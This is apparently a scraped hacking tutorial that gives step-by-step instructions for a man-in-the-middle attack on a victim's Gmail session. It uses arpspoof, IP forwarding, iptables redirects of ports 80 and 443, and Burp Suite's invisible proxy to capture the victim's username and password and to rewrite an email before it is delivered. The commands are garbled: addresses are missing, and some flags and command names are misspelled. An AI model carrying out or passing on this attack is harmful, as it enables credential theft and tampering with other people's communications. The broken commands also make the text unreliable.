There are various vibrant
attacks of burpsuite that many not know off; therefore we will try one for
those in this article today. We will learn how to get between the networks of
gmail and then to change the message o the mail before it reaches receiver.
First of all, go to the
terminal of Kali and type:
arspoof -i wlan0 -t
-i --> interface
wlan0 --> network (This
can be either ethernet or wlan depending on your victim i.e. if your victim is
using eth0 then you should also use eth0)
-t --> target --> Victim
IP --> DNS
Execution of the above
command will capture the packets that are sent from victim to router. And once
we have captured these packets we will open another terminal in Kali and type
the following command which will make us capture all the packets from router to
arpspoof -i wlan0 -t
-i --> interface
wlan0 --> network
-t --> target -->
DNS -->
victim IP
This command will
capture packets that are sent from router to victim IP. Now type the following
the command so that IP forwarding is enabled in our PC.
echo 1 >
Then type the
following the command so that all the packets on port 80 will go through our
iptables -t nat -A
PREROUTING -p tcp --dport 80 -j DNAT --to -desitination
Then type the
following the command so that we can all the packets on port 443 will go from
our IP.
iptables -t nat -A
PREROUTING -p tcp --dport 443 -j DNAT --to -desitination
After all this is
done then open burpsuite and go to proxy tab and then select options
tab. Once you have reached here click on Add button.
Clicking on Add
button will make the following options appear. In this give port no 80 in
the box adjacent to bind to port and in specific address give
your IP.
Further on, Select Request
Handling tab and check Support invisible proxy. And then click on ok.
Repeat the above
steps for Port no 443 too.
After clicking on ok
make sure all the boxes of running and invisible are check.
When the victim will
sign in his/her gmail account we have its data captured in burpsuite.
And all this
captured data will contain username and password of the victim as shown below.
Here is the closer
view to the username and password.
The victim will type
and send the message without suspicion:
But as the victim will
click on send button its mail will come to us before reaching destination.
Now you can change
the text of the message by a simple left click on the message area and type
your message as I changed HELLO THIS IS TESTING to YOU HAVE BEEN
Once you change the
message then click on Forward button on the top left side and the mail will go
forward to its destination as shown below:
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